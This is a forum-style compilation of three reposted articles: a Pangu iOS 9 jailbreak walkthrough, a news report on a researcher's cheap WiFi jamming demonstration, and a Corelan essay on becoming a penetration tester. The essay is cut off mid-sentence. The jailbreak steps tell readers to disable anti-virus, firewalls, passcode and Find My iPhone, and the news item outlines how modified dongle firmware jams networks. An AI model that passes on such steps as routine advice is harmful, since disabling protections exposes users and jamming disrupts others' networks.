How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak By Patrick Gumban last updated October 14, 2015 It’s here folks, the very first jailbreak for iOS 9 and it’s Pangu who’ve beaten other jailbreak teams to the punch. The best thing is that this iOS 9 jailbreak works on all supported devices including the iPhone 6s and iPhone 6s Plus. Below, we’ll show you the steps on how to jailbreak iOS 9 – iOS 9.0.2 on iPhone &iPad using Pangu Jailbreak. Before you proceed: The jailbreak is only available for Windows. Mac users will have to run a virtual machine to use the Pangu iOS 9 jailbreak. The jailbreak works for: iOS 9, iOS 9.0.1 and iOS 9.0.2. Pangu is an untethered jailbreak and will work on all iOS 9 supported devices. Backup your iDevice via iCloud or iTunes to save important information just in case something goes wrong. For good measure, disable anti-virus programs and firewalls since it doesn’t play well with Pangu jailbreak. How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak: Download the latest version of Pangu Jailbreak. (Pangu 9 v1.0.0) Disable Passcode by going to Settings > Touch ID & Passcode > tap Turn Passcode Off. Disable Find My iPhone by navigating Settings > iCloud > Find My iPhone > and toggle the Find My iPhone to off. Enable Airplane Mode by going to Settings then toggling the Airplane Mode switch to on. Connect your iPhone, iPad or iPod touch to the computer via USB. Run the Pangu executable you’ve downloaded in step 1 as an administrator. Right-click on the executable file and select “Run as administrator.” As you open Pangu, your device should be detected. Click the Start button to proceed. On the next page, click the Already Backup button. The Pangu app will now start the jailbreak. Your device will reboot and at around the 65% mark, you will be asked to re-enable Airplane Mode. At the 75% mark, you will be asked to unlock your iDevice and run the Pangu app from the Springboard. There will be a message from the Pangu app asking you permission to access the Photo library. TapAccept, then OK on the next dialog. The jailbreak process will now continue and once the progress bar is complete, your iOS device will reboot. You should see Cydia sitting nicely on your Springboard. And that’s it! Your iPhone, iPad or iPod touch is now jailbroken on iOS 9. A big thanks to the Pangu team for releasing such an early jailbreak. Sound off in the comments if you have questions about the guide. Sursa: How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak

WiFi jamming attacks more simple and cheaper than ever Posted on 13 October 2015. A security researcher has demonstrated that jamming WiFi, Bluetooth, and Zigbee networks is not difficult to perform but, most importantly, also not as costly as one might think. According to Mathy Vanhoef, a PhD student at KU Leuven (Belgium), it can easily be done by using a Wi-Fi $15 dongle bought off Amazon, a Raspberry Pi board, and an amplifier that will broaden the range of the attack to some 120 meters. The attack would hit all devices within range that operate in the 2.4 and 5 Ghz bands. With the above mentioned networks being crucial to the functioning of many IoT devices and systems - home security systems, car locks, baby monitors, and so on - it should be obvious that the fact that these attacks can be performed so easily and cheaply may lead to serious consequences. In fact, it is known that cheap jammers are already being used by crooks around the world: That's why it's crucial that defenders are able to detect these attacks when they are going on, even if they can't stop them. During his recent presentation at BruCON, Vanhoef explained that by modifying the dongle's firmware he was able to force the target networks to always give priority to the device's transmissions. If the device is made to transmit continuously, it means that all other devices won't be able to, making the channel effectively unusable. His attempts at selective jamming (blocking specific packets) have been less successful, and he concluded that 100% reliable selective jamming is not possible. He also says that these low-level jamming attacks could influence attacks on higher level protocols. For example, he says that they can be used to mount a channel-based MiTM attack against WPA's Temporal Key Integrity Protocol (TKIP), which is still widely used. For those interested in more details, here's a video recording of Vanhoef's talk: Sursa: WiFi jamming attacks more simple and cheaper than ever

How to become a pentester Published October 13, 2015 | By Corelan Team (corelanc0d3r) Intro I receive a lot of emails. (Please don’t make it worse, thanks!) Unfortunately I don’t have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members of the community will jump in and help me answer those questions. One of the most frequently asked question is “how do I become a penetration tester”. Depending on whom you ask this question, you may get different results or may be told to take a specific approach. With this post, I am trying to formulate my views on this question (with a focus on the process and not so much on the technical aspect), in an attempt to hopefully provide a good starting point for those that find themselves in a similar situation. For the record, I am not a penetration tester… but I try to apply common sense (seasoned with a touch of plain logic) to challenges and pretty much all situations in life. Don’t hesitate to provide feedback, suggest changes or tell me to STFU and GTFO. Any motivated additions or changes to this post are more than welcome, and I’ll update this page as needed. Where to start … or ? There are a couple of approaches to getting started with information security. Approaches change as time flies by, technology changes, new platforms are designed & implemented, etc… All of this influences what is supposed to be the latest “hot” topic to dive into. Before doing so, regardless of the approach you take, there are 2 fundamental questions you should ask yourself: 1. How much effort (time, …) am I willing to put into this? I have been working on exploit development for many years. Truth is that I don’t have an advanced background in systems programming, not been trained in latest technologies. All it took was a lot of time & dedication, a strong will to learn and absorb new things. You can learn as fast as your brain is able to process and remember, and practise is able to lock down into your mind, converting the knowledge into experience. Some people learn fast, others need more time. Nothing wrong with both approaches, but being self-aware, self-conscious about your abilities and being realistic about the time you’re able & willing to invest into supporting the learning process is important. Another factor to take into consideration is your balance between the various powers that play in life. If you have a family, make sure to talk with your family members and find a good balance between spending time with them, and spending time on this learning experience. Even if you’re alone, get out from time to time. Don’t rush into things, but try to dose and apply a healthy time-consumption model. Let your brain process, think, and take your time. This “time” factor brings us to the second point: 2. What is my goal? People set goals all the time. Goals can be far away in terms of knowledge & experience needed, they can be even so far away that they look more like a dream than anything else. The good news is that it is OK to be ambitious and to have dreams. However, from my experience, it will be easier to achieve your ambition by breaking the dream into smaller objectives, into smaller goals. So, my (quite limited) definition of a goal or target is something realistic, something you can achieve, using one or more steps (actions). We can discuss about semantics, words and definitions, but that’s not the point of my statement. Let’s apply the dream/goals/targets logic to the topic of this post. Let’s assume it is your dream to become a pentester. The concept of being a pentester is quite exciting, but it’s quite vague at the same time. What exactly do you want to do? What type of pens .. errr.. targets do you want to test. Why do you want to do it ? If you don’t have the answer yet, it might be useful to talk to pentesters and ask what type of work they do, and see if you are interested. Let’s say your ideal scenario involves testing the overall security level of corporate networks, perform audits against web applications and do something with “mobile devices” because that’s what people told you. Perhaps it’s social engineering. It doesn’t matter what you select, those are your goals. They are part of the “pentester” definition, but you’ve just broken down the dream into goals & targets. Why am I being so philosophical about it? Well, becoming a pentester who is specialized in all types of audits may not be realistic after all. Technologies change so fast that it may not be possible to become an expert at everything, right away. Trying to understand & master everything would not be a realistic goal. It might still be a dream though, and you might eventually get there. It all depends on how much effort you’re willing to invest. Taking this one step further, don’t be discouraged nor too enthousiastic by what other people say. Timings are personal, there is no good or bad. The god news is : you can do whatever you want, some things will take more time than others. It’s not about “IF” you can do it, it’s about “WHEN”, and how realistic this “WHEN” is. Being a pentester does not mean being good at using tools either. It’s about being able to understand how things work, how things are configured, what mistakes people make and how to find those weaknesses by being creative. Being a pentester is not about launching Metasploit against the internet. A couple of years ago, I got interested in photography. After taking many pictures using my smartphone and being encouraged by family members that kept repeating how great my pictures were, I decided to buy a DSLR. Guess what. Buying a better camera or lens doesn’t make me a better photographer. In fact, it made things worse because I didn’t understand how light works, how a camera can be tuned to deal with the light and how we can influence light to get better pictures. Smartphones are designed so you wouldn’t have to think about it. Beginners mistake. The reality is that learning how things work is time consuming, frustrating… but it will be rewarding in the end. I’m still not a good photographer, but I don’t mind admitting it either. I consider this to be a journey and at least I’m determined to understand the fundamentals first; to try and to make mistakes a lot; and not to be afraid to ask for help. So, this brings me back to the original question: “Where to start”. It should be clear by now that perhaps you should try to answer “where do you want to end” first, as this will tell you where to start. Don’t worry, even if you make mistakes, even if you find out that you picked the wrong (“less exciting”) targets, you still win. Any knowledge you gain is valuable to a certain extent and can be helpful along the way. There is a second way to look at the “goal”. You can also define your goal as “your ability to generate an income”. Let’s assume, for the sake of this post, that you would like to make money as a pentester. This means that you may have to select certain technical objectives (knowledge) that will provide economical value. This could be driven by popularity of certain types of technology (web apps, for example); or relatively new areas (Internet Of Things, Mobile, …). So, even if you want to do many things (and should be looking at a broader perspective), there is a big chance that you will have to specialize in specific areas. Before continuing, I’d like to @thelightcosine quoting HD Moore: “If you don’t think you’re a n00b, you’re not trying hard enough”. Challenge yourself. Try to learn more about something, try to gently push your limits, but do it in a realistic way. Never give up. It’s a painful, long, but very rewarding journey. Ok, got it. So, where to start ? Assuming you know where you want to end, and you have a realistic plan that involves dedicating time and efforts; what should you do with your time? Before talking about possible roads, I’d like to briefly mention something that will become the most important part of your journey. It’s YOU & your attitude & mindset. You’ll be the one doing the work. You’re the one that sets goals and wants to start working. You’re the one that will make this work. But it requires a specific attitude to do so. It’s the so-called “hacker” attitude. There are many definitions of the word hacker; but most of them boil down to this: A desire to understand how things really work, so you can optimize/change the behaviour, or apply the understanding to bend the rules of the game. Hackers tend to break stuff; penetration testers tend to break stuff too. The goal should be to break stuff in order to come up with solutions on how to improve it. If the purpose is to break stuff so you can prove you can break stuff, and systems/people have flaws… Newsflash: we already know that. You’re wasting your time. You’re a breaker, not a hacker. If you truly want to be a hacker, break stuff because you want to fix it, make it better. The word hacker can be applied to many disciplines. It doesn’t need to be tied to computers, it can be applied to science in general as well. In fact, without hackers, we would not have medicines, or technological evolutions. Be critical about what you see. Try to understand what you see. Ask questions and don’t accept the “I don’t know, that’s how it works, that’s what someone told me, just accept it and move on”. Ask yourself the question “what would I do if I had to design X or Y”. Putting your thought process into the mindset of someone else will help you understand why things work the way they work, how they were designed, and how people use them the way they use them. Using empathy & understanding that other people have different views will broaden your understanding of things, which in return will help you to discover strengths and weaknesses. Being a hacker is not technical. It’s a mindset, it’s psychology. It’s beautiful. It’s very powerful. (Sidenote: I am truly blessed to be able to spend time with extremely intelligent hackers all over the world. Each of us has the potential to change something, to improve something. We can even change the world; if we would organize ourselves in a better way. Maybe it’s time for selecting a new dream, a dream that involves hacking the world. Anyways… ) Ok Ok, cut the crap, where to start? Hold on. We’re almost there. Before giving you some hints on how to approach your journey, I’d like to share some thoughts on asking questions. In fact, unless you’re born with all the answers already, you’ll probably end up asking questions. Even if you know what your ultimate goal is, you may not know how to get there, or what is needed to get there. The only way to figure out is by asking questions. Interestingly enough, the way you ask a question and the type of questions you ask, will determine whether you get the answer you need or not. I often hang out in various channels on IRC and I’ve been subscribed to a bunch of mailing lists for a long time. I see people asking questions and other people trying to answer questions on a daily basis. You would think that asking or answering questions is a trivial thing, but interesting enough, people get yelled at, kick-banned from IRC channels, or humiliated in public just because they were trying to find the answer to something they don’t know. Lots of people end up frustrated because they failed at getting a satisfactory answer, and other people get frustrated because they felt they were wasting their time. What exactly causes this conflict and how can both parties be more effective at asking and answering questions, and hopefully avoiding painful situations? Most of the items below are based on cases where direct interaction is possible (IRC, Instant Messaging, and so on), but they can be generalized very easily and are applicable to any form of communication (email, support form, forum). Asking questions Asking questions is very easy. Asking a good question seems to be far from easy. What does it take for a question to elicit a valuable answer and how can you avoid that people will start throwing tables, bicycles and elevators at you because you just wanted to get an answer? I’ve tried to gather some ideas on how to be more efficient at asking questions and increasing your chance on not only getting an answer, but also getting a helpful answer. A few years ago, I did a small survey on Twitter to discover what people believe are the ingredients of a “bad” question. The results included: No indicators that the person asking the question did any of their own research or attempted to find an answer, Googling Bing or Binging Google; When the question is ambiguous; When you forget to ask the question; Massive preamble to get to the question. There are a couple of things you can do to avoid common pitfalls and getting your question labeled as “bad”. For starters, I don’t think bad questions exist. There’s always a reason for a question, or logic behind a question. It just may not be clear what it is exactly, because of poor communication or other reasons, but that doesn’t make the question bad. I’m listing some ideas below, in no particular order. Avoid the obvious answer. Think about your question. How easy would it be to find the answer online, on Wikipedia, via a simple Google search or by reading product documentation? If you’re lazy, don’t expect people to show appreciation for that. Trust me, being honest about your laziness, won’t help either. If you get kickbanned from IRC because you are lazy and you advertise or admit it, you probably deserve it. Show that you deserve an answer and anticipate. Do your homework. See what you can find about your problem on the Internet, try a few things yourself and document what you did. Be prepared to show what you did. Be honest and accurate. People are more likely going to help if you show that you have tried and willing to try more. As soon as people sense that you just want to be spoon-fed, your support channel is going to blow up in your face. People might ask you to reproduce the steps you took to end up in your current situation, so you can anticipate to that. Put your documentation and procedure on Pastebin or Pastie before asking the question and be prepared to provide a link to your documentation when needed. Don’t leave out vital information or be embarrassed about something you did even if you think you shouldn’t have done it. It might very well be part of the problem and if you want a solution, you’d better be honest. Be as factual as possible in describing your problem and don’t let your thought process take over. Describing the symptoms and the exact steps needed to reproduce the symptoms will work better than explaining what you think the problem is. You may have missed something obvious and if you don’t share all the facts, people may not be able to discover what really went wrong. If you’re trying a procedure or a tool and you get an error message, there’s a chance that other people have encountered the same situation. Google for the error message (leaving out specific parts such as IP addresses, and so on) and see what you can find yourself. Make sure to construct your question in a way that would make people believe you just want a gentle push in the right direction. Instead of asking “I don’t understand how this works” or “I want to hack Gmail” you could also ask “What would you recommend I should learn to do this or that”, or “Does anyone have any recommended sources about SQL injection against an Oracle database”? You’re trying to achieve the same goal and you’re pretty much asking for the same thing, but you’re shifting the focus to the process of learning and finding a solution instead of drawing attention to the problem or goal itself. It’s perfectly fine to ask for “some pointers in the right direction”.There’s a famous Chinese proverb that says “Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime”. If you have a problem, you may choose the fastest and easiest path and get someone to fix it for you by giving you the solution right away. If you’re taught how to troubleshoot a problem, you may be able to increase your insight and improve your ability to prevent and fix future issues yourself. The more you focus your question on what you can do and should do yourself, the easier it will be to convince someone to help you out. What also often helps is to explain your problem to a friend first. In some cases, explaining the problem and allowing a friend to try to understand the problem might also expose the solution. This has happened to me and helped me in numerous cases. In short, the more work you put into finding a solution yourself, the more precise your question will be and people will appreciate that. Break things apart and be critical to yourself. Before asking a question, break down your question into technical layers and components. Do you fully understand the other components or prerequisites needed to reproduce your problem? If you are asking a question about attacking a remote computer, make sure you understand the networking layer and have checked that everything is set up correctly between your device and the remote computer. If you don’t know enough about networking, you shouldn’t be attacking something that uses the network. Don’t forget or ignore that others had to go through the same learning experience as you did and had to work to for it. If your question suggests that you just want to skip learning fundamental knowledge, people may be offended because you’re basically disrespecting the hard work hey have done in the past. Consider there is a possibility that you still have a long way to go, and that “understanding” something doesn’t necessarily mean you are applying it in the right way. Instead of asking why a certain technique for a certain case doesn’t work, you may need to wonder whether you fully understand the technique or not. Don’t start with an apology. There’s no need to apologize for not knowing something. It usually only makes people raise an eyebrow for a brief moment and move on. You should only apologize to yourself for not asking proper questions or for not being prepared to work or learn. Don’t apologize for your lack of speaking or understanding English. People don’t care. If it’s bad, they’ll notice it’s bad. You have the opportunity to improve your English by reading documents, interacting with people, so you might as well do something about it. If you’re unsure, prepare your question in advance and relax. If you’re asking a good and well-prepared question, nobody will even notice. Of course, if support is available in your native language, that should be your first option. I’m not trying to say that apologizing is a bad thing. It’s a token of maturity and respect, and can be very powerful in conflict situations and negotiations. I’m just not convinced it will help you getting an answer. Don’t hide behind the fact that you don’t speak a language very well in order to insult people. I’ve seen this happen before: somebody walks into an IRC channel, starts by apologizing for his bad English, and then blatantly insults everyone in the room. Bad idea. Excuses are not a magic patch for stupidity. Be nice, polite and don’t be impatient. Even if your question is urgent, if you decide to rely on community support, you also have to realize and accept that people have lives too and may have other priorities than answering your question. Asking “why” you’re not getting an answer after 10 minutes may trigger people to ignore you, so don’t do that. Maybe you need to rethink your question instead, or find another source of information or support. Public forums and IRC channels are not private support channels. Don’t expect the entire world population to care about your problem, so make sure not to flood the channel with your issues. Although IRC and Instant Messenger tools allow for direct communication, it doesn’t guarantee that the communication will take place when you want it and at the speed you want it. Timezones are real and the people that have the answer may be asleep. Accept it. Even if you think a tool is terribly broken, focus on what you may potentially have done wrong. Others will appreciate if you ask “what I have done wrong” or “what you should do different” even if it’s a genuine bug in an application or tool. If you start by saying you believe a certain tool is broken or ask “why” a tool is broken, you’re going to draw attention to yourself in a bad way. One bug in a tool doesn’t make the tool bad, so don’t disrespect the work of many people who may be reading your comments.You’re the one to open a discussion, and you’ll never get a second chance to make the first impression. The tone for the rest of the discussion is going to be set as soon as you initiate the communication, so be nice and respectful. Only make jokes if you’re sure others will understand and appreciate the joke, and won’t be offended by it. You don’t know who’s behind the computer at the other side, so avoid anything that is potentially offensive, sexual oriented, inspired by religion. Understand that there are different cultures, different points of view, different people. None of them are good or bad, better or worse. A lot depends on how well you know the people you are addressing. (Sidenote: this is also why a “hacker culture” doesn’t really exist. We’re all individuals, with different backgrounds, cultures, beliefs. It doesn’t matter what you look like, what language you speak, what clothes you wear. or what the color is of your skin. You’re a hacker by the things you do, and why you do them.) Jokes about yourself or your situation are an exception of course, and are often perceived well. Complaining about your crappy Internet connection and how it makes you consider sending faxes again, or make a comment about how the fact that your dog is so fat that it interferes the Wi-Fi signal in the house are just a few examples on how to help set a friendly tone. Be creative, don’t overdo and choose your timings carefully. Maybe you are impressed by the skills of the people you’re going to address when asking your question. Don’t start yelling how “l33t” or “pro” you think they are, and how easy it would be for those people to answer your question. This may set off some red flags and make people think you’re a troll. Be yourself, act normal, be polite and you’ll be fine. Make it easy to answer. If your question is too broad or contains too many elements that are open for interpretation, ambiguous, questionable or vague, don’t expect anyone to take a few weeks of holidays to show you around. Choose your audience. What would be the best place to find an answer to your question, and who would be the right person to answer your question? Forums and IRC channels often focus on a certain topic, so try to pick the right medium and channel to ask your question. If your question is related with the use of a tool, it might be a good idea to find other users instead of sending your questions to the tool developers right away (or use the support mechanisms they made available). Ask the question. Don’t start by asking if you can ask a question. There’s no need to ask if someone is online or available to answer your question. Just ask the bloody question. If someone is online and if your question makes sense, you’ll get an answer. Unless you are picking up where you left off from a previous discussion, don’t target a specific person. Other people might ignore your question if you’re suggesting that only a particular person can answer the question. If you want to get an answer, make sure it is perfectly clear what the question is. If you simply state “I have a problem with X or Y”, “This tool doesn’t work” or “My exploit got detected by Antivirus”, you’re technically just making a statement and not asking a question. Asking what you did wrong or what you can do to make something work (better) is more likely going to get you what you want. Even if you have to explain the context of your problem, try to keep it short, to the point and move to asking the question as soon as you can. Listen, interact and seek clarification if needed. Try to understand the answer and don’t reply to it right away. If someone tells you to investigate something else, do it. Don’t keep hammering away, ignoring advice that was given to you. If an answer is not clear, ask for clarification, but do it in a way that suggests you’re trying to learn (process) and not trying to be spoon-fed (solution). As explained earlier, the better you are at setting the right tone and suggesting you only want some hints in the right direction, the higher the chance someone will help you. When asking for clarification, try to formulate it in a way that explains what you did and didn’t understand. Rephrasing or summarizing certain parts often helps to show what part of the answer was clear, and what requires further clarification. Rephrase/Consider starting a new question with: If I understand you correctly, What you’re saying is that… In other words, What if Does that mean… In the event you didn’t understand the answer at all, don’t be afraid to say so. Ask if that person could rephrase, explain something in a different way or elaborate on a certain part of the answer, and do it in a polite manner. Be grateful & give back when you can. If someone tried to help you, tell that person you appreciate the help, even if it didn’t fully answer your question. Realize that a lot of people have other things to do than answering questions. If they are trying to help, it’s because they want to help, despite tight schedules, deadlines at work and other priorities. Credit them for taking the time. Do it in a short, clear and efficient way. Mention how the answer was helpful. If you have the impression the question you asked is a very common question, and your gut feeling says that the person who answered the question is actually getting sick and tired of having to address the issue over and over, you may want to consider lending him a hand. Document your question and the solution and put it online somewhere. It will help you to understand the cause and the solution, you can ask the person who helped you to verify your document to make sure it’s accurate, and you can help other people by simply pointing them to your online document. It demonstrates you want to learn, you’ve listened and you want to give back. Don’t wait to share until you have all the answers. Guess what, you’ll always find another question. Answering questions Asking good questions is definitely an art that requires a bit of preparation. Answering questions, if you really want to help someone, is not trivial either. Although some cases may suggest the opposite, there’s no such thing as dedicated askers and dedicated answerers (not sure if that is even a valid word). No matter how experienced you are, you might still find yourself at both sides of the story from time to time. When you’re in the position to be able to answer a question, you really are in a unique situation. Think about it, you have the power to decide whether you want to answer the question or not, and on top of that, you can choose how to answer the question, which will have a direct impact on whether the answer will be valuable or not. If you decide to take the time to answer a question with the intent of helping somebody, you might as well do things right. Maybe some of the following guidelines may be of assistance: Be nice. There is a reason why the question was asked in a certain way. You should be able to sense the difference between somebody who’s after a quick win and somebody who is genuine, who really wants to learn, but doesn’t know how to communicate well. When you’re not sure, grant the person the benefit of the doubt, you can still yell at him later. There’s an easy way to help someone if they were too vague or didn’t make themselves clear. Simply rephrase the question and ask if that is what they want to know, or just tell him his question didn’t make any sense and ask that person to be more specific. It will make sure you properly understand the question and it will show the person how to properly phrase a question next time. There’s no reason to make fun of someone or make him/her feel bad. He or she already admitted being in the dark about something. Think before you answer, ask for more info. Do you really understand the question? Is your answer going to be helpful? Ask for clarification if the question is not clear. Rephrase; ask for an example. Try to reproduce the steps needed to come to a problem and ask for more details and documentation. Don’t answer because you have to. Only answer a question because you want to help, and have the time to help. Although the first question may seem reasonable, it might get worse very easily. If you decide to step in to help someone, at least you’ll have to try to get the asker onto the right path, and it’s hard to estimate how much time you’ll need for that upfront.If you do things right and understand the question well, it shouldn’t be too difficult or time consuming to answer the question right away, or point the asker to the correct resources. Reply with a question. Tricky one. Some people enjoy doing this all the time, which can totally freak out people and destroy normal communication, so make sure to use this technique in specific cases only. There certainly is a lot of value in replying with a question, providing that the question suggests a solution, or aims at getting more information. Let’s take a look at a quick example: Question: “I ran an exploit against a target computer and the exploit says I was not able to get a reverse shell.” Many things could be wrong with this scenario, making it hard to answer the question in just a few words. Asking a few short questions might put the guy back at work, trying to get more details on why his procedure didn’t work. You could for instance ask if both hosts are able to connect to each other. This suggests that there might be a network related issue. It shows that you understand the individual layers related with the act of exploiting a remote computer, and you help him using a structural approach to troubleshooting this kind of problems. Asking questions about the question itself might reveal underlying reasons and motives. Sometimes people are too embarrassed to admit something, because they can almost sense they are doing it wrong, or perhaps they know they are doing something illegal. By asking specific questions about why they want to do something, or suggest them to do things differently (in a way that wouldn’t involve potential illegal activity), might give you some helpful information about that person and if his intentions are legit or not. If someone is having problems running an exploit against a machine on the Internet, you may want to suggest him to simulate the procedure in a private lab. If the person chooses to ignore your suggestion and insists he wants to do it over the Internet, you’re almost positive he’s up to no good.Try to discover what the person is trying to do. If someone asks if it would be possible to do a certain thing, ask him what he’s trying to achieve. Ideally, it will force the person to explain and reveal any underlying motives. Be honest. If you’re not sure about the answer, just say so. There’s nothing wrong with admitting you don’t know something for sure. Guessing is acceptable, as long as you make clear you are guessing. It may suggest possible solutions and perhaps put the person on the right track already. Stimulate, don’t burn. You can demonstrate your skills by providing a helpful answer, not by showing off, emphasizing how smart you are. Based on how specific the question is, and how it reflects the level of knowledge possessed by the inquirer, you can adjust the level of detail of your answer accordingly. If you need to explain that something is wrong or bad, don’t forget to explain why it is wrong or bad and give pointers on how to avoid or fix the issue. You don’t need to answer questions in detail, as if you’re reading a tutorial to them. A gentle push in the right direction is often good enough to stimulate the learning process. It’s ok to put someone on the right path and point him to the resources he should study if he wants to make progress in the future, but don’t just throw URLs at him. If the other person understands why he needs to learn something, it will be easier to convince him to take the effort to do so. Of course, if the same person just continues to ask questions and doesn’t want to take the time to learn things properly, your answers are obviously not going to help anymore, and that person probably doesn’t want to be helped. He just wants someone to do the work for him. In that case, there’s no value in trying. Wait until the person has figured out he needs to work for it, and ignore him until he proves it. Language. English is an important language in international IT or Infosec communities. However, that doesn’t mean everybody is a native English speaker or even remotely close to that. The use of common and universal terminology is perfectly fine, but try to keep your sentences as simple as possible. We don’t want to make the poor guy suffer more than necessary, do we? If you notice during the conversation that the other guy didn’t really understand your answer, challenge him and verify that he understood what you said. Try to figure out if it’s a language issue or knowledge issue. If it’s the first time both of you are talking, it might be acceptable to just ask the asker if he understood what you said, so you can adjust your vocabulary if needed. See if you can give an example to clarify, or just ask a question about your explanation. If you’re in a kind mood, you could say something that would suggest that it’s ok to ask more questions if needed, which should break the ice if the inquirer is a bit shy. Spot the troll. Surely, there are people with too much time on their hands, without a real life, trying to waste everyone’s time by asking a combination of stupid and intelligent questions, just for the fun of it. A small minority of these so-called trolls actually master the subtleties involved very well and might make it sound like they have a real question, and then continue to combine silly questions with good questions. If done well, these folks might actually keep you busy for a while. Luckily, most trolls have bad ninja skills and can be easily recognized. Wasting the time of brave volunteers and people who really want to help is not very nice. Getting kickbanned, they should. Provide feedback. If nothing worked and you have a few moments of time, explain why a certain question or remark didn’t work. Maybe the asker said something disrespectful or suggested that he doesn’t really want to learn things properly. Worst case, he’ll ignore your advice and you can choose to ignore him too. Best case, he’ll learn from your feedback and approach things differently next time. Update: Check out The XY Problem Sigh. Ok. Please, where to start ? Horizontal or vertical ? I don’t really care whether you prefer to stand up, or to lay flat when learning new things. What I mean with the “horizontal or vertical” title is: should you focus on learning a broad variety of things first (horizontal), or should you dive directly into the area you’re interested in (vertical)? Good question. There are definitely pros and cons in both scenarios, there are more opinions than people. Yours truly has been blessed with opinions as well, so I’ll share my personal view. Understanding the big picture first is useful. If your goal is to become a web application pentester, it would probably make sense to learn all layers involved, ranging from operating systems, networking, web server & application technologies, commonly used database platforms and common development languages. This is a big animal. The amount of information you’re interested in, usually depends on what you need. At the same time, the better you understand how things work, the easier it will be to understand how to bend the rules. My recommendation is : try to understand as much as you can about the various layers first. Don’t be impatient and dive into the nitty gritty details of finding bugs or exploiting right away. Especially the availability of tools will make your hands itchy and lowers the hurdles to start attacking systems right away. Always keep in mind that tools are not magic. They simply automate things. The better you understand what they do, the easier it will be to use them. Don’t get me wrong, tools are useful. Just don’t use them until you understand what they do, how to configure them, how to use them properly. So, I believe there is a lot of value in trying to understand the system engineering aspect of systems. Understand how things communicate, how things are set up, secured, operate. Don’t overdo either. You don’t need to be an IP expert that understands all the RFC specification. You probably need more than what you need to abuse it. You’ll need enough to use it and abuse it. Furthermore, understand that you can take a phased approach. You don’t need to be a BGP routing expert to perform web application testing. It doesn’t hurt if you are, but you can still learn it when you’re ready to expand your horizon and dive into other aspects of security audits. Be realistic in the goals you set, and try to accurately determine the prerequisites needed to get there. Ask multiple opinions if you’re not sure and don’t be afraid to learn too much rather than not enough. How to learn? There are many ways to learn new things, some of them are quite personal (= as in: they only work for some of you, and not for others). Some people are able to learn new things by reading a book or blog post. Some need to visualise things, and others need someone to explain things in a video or face-to-face setting. There are solutions for every methodology. You can buy books or read publications online. You can take classes (online or in real life), and you can find lots of online challenges to practise your new skills. There is nothing wrong with any of these approaches, as long as you understand what works best for you, so you can adapt your strategy accordingly. The common aspect of all of these learning methodologies is to get practise. Trying out things for yourself (guided or non-guided) will make it easier to remember and to eventually transform the knowledge into understanding & experience. In any case, having up a virtual lab environment can be extremely useful. Nowadays, Virtualization technology is now available for most common platforms, it’s cheap/free and allows a great deal of flexibility. VirtualBox, VMWare, Parallels, Xen, Hyper-V are just a few examples. Although this is not a catch-all advise, you’ll get a long way by installing a Windows and a *Nix/Linux system. Of course, understanding how to manage & operate these systems is fundamentally important. You don’t want to spend your time fighting the tool that are supposed to support your learning experience. Spoon-feeding Spoon-feeding sounds like something we do to babies, right? If you ask experienced people whether spoon-feeding is right or wrong, I bet most of them will tell you it’s bad. I believe the answer is not black & white. It depends. First of all, we’ve all been spoon-fed. (Or at least most of us). This is what our parents did when we were not able to feed ourselves. This is what teachers do when you are entirely new to something. This is what we should be doing to put people on the right track. We’ve all been told certain things to allow us to practise, get better, and get to the next phase. There is a thin line between stimulating in a supportive way, and leaving people behind with no help whatsoever. In “Leadership and the One Minute Manager – Increasing effectiveness through situational leadership II”, Ken Blanchard explains 4 different “development levels”. One of these levels is defined by a high commitment and low competence. This may be the place where you are right now. You’re quite excited about learning something new, but you have no idea on where to start. For scenario’s like this, some spoon-feeding can be useful. It doesn’t mean that someone else will do all of the hard work for you, but simply being told to “go figure it out” without giving directed pointers or hints is not useful either. As soon as you learn more (and become more competent), you’ll discover that there is much more to learn. At this point, you may find yourself becoming less committed, because you’re starting to realise there is still a long road ahead (which can be quite demotivating). This is normal too. At this point, spoon-feeding won’t help. In this case, coaching is more appropriate. Asking the right questions will force people to think, to apply the knowledge they already have, and look for answers. If they’re stuck after all, and have no way to discover answers themselves, perhaps it’s time to take one step back and get some detailed help after all. So – please be careful when being negative about spoon-feeding. The situation (development level) determines whether it’s the right approach or not. Anything else? No, not really. Thanks for asking. Time to start drawing the tree that will become your journey. 1. Networking & operating systems I would suggest to start by learning how systems work and communicate. Try to get a good understanding of TCP/IP, OSI layers, ephemeral & server ports, routing, port forwarding, NAT, firewalling, etc. You’ll need it when trying to connect to targets, you’ll need it to use tools, and you’ll need it to configure your environment to allow your security audits to be successful. You’ll also need to be able to manage & operate common operating systems. Together with networking, this should be your primary starting point. Most of us are familiar with one operating system, but it “doesn’t hurt” (=understatement) to understand how to use and configure both Windows and Linux/Unix. You should become fluent in setting up networking configurations, basic security features & implementations, using both command line utilities and GUI tools. Start to use these systems as your main desktop, use them on a daily basis in order to force you to become familiar with them. I know, I know, you’d like to start attacking systems right away, without spending too much “overhead”, right ? I fully understand that it sounds very exciting to start using portscanners or other tools right away, but what’s the point in using the tools if you don’t know what the output of the tools mean? Even worse, you could easily cause damage if you don’t know what you’re doing. 2. Multi-purpose resources Next, try to get a broad understanding of the attack landscape. Maybe you already made up your mind about becoming a web application pentester, but it still doesn’t hurt to understand what else is out there. There are many resources on this topic, but I decided to list the most important ones (at least the ones that cover a wide spectrum of skills): A hands-on introduction to hacking Grey Hat Hacking – The Ethical Hackers Handbook “Hacking Exposed” series Professional Penetration Testing (If you feel an important resource is missing, let me know. Oh, and to the publishers/authors: if you would like to provide our readers with a discount coupon code, please contact me ) Aside from getting a better view on the landscape, you’ll learn a few things about pentesting methodologies & approaches, including the difficult art of translating technical findings into something a customer or business can use and understand. Being a pentester does involve paperwork too. Just sayin’. Again, apply the true hacker mindset. Break stuff because you want to make it better, not because you want to break it. Without truly trying to “make things better” in reality, you’re just a breaker. (So – don’t complain about mistakes others made. Think & fix. Add value. Learn how to secure, harden and protect as well.) 3. Scripting & Tools No matter how long you look at it, you’ll end up using scripts and tools that automate certain things. You may even want to change existing tools or write your own to make your life easier. After all, that’s what scripts are for. They are a tool, not a goal. Becoming familiar with scripting languages such as python and ruby is a must. You don’t need to be an expert, you’ll get better as you start to use them. Understanding some C / C++ can be useful too, as some people tend to write tools in lower-level 